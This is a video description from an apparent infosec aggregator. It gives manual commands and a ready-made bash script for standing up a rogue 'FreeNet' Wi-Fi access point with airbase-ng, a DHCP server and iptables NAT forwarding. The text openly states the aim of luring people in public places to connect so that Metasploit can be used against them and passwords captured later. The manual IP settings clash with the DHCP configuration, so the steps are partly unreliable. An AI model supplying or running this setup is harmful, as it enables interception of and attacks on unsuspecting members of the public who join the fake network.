Description: In this video I will show you how to create a fake Access point.
What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords.
Steps : -
apt-get install dhcp3-server
airmon-ng start wlan0
airbase-ng -e FreeNet -c 11 -v wlan0
ifconfig at0 up
ifconfig at0 11.0.0.254 netmask 255.255.255.0
route add -net 11.0.0.0 netmask 255.255.255.0
gw 11.0.0.254
---- Add Config in dhcp3 ----
Path = /etc/dhcp3/dhcpd.conf
---- Paste it this -----
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0
echo "1" > /proc/sys/net/ipv4/ip_forward
If you feel boring to type all these commands no problem Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error.
Source : - exploit.co.il
#!/bin/bash
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;
echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan0 # Change to your wlan interface
sleep 5;
airmon-ng start wlan0 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface
sleep 5;
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo "1" > /proc/sys/net/ipv4/ip_forward
Tags: hacking , hack , wireless , network , fake , AP ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.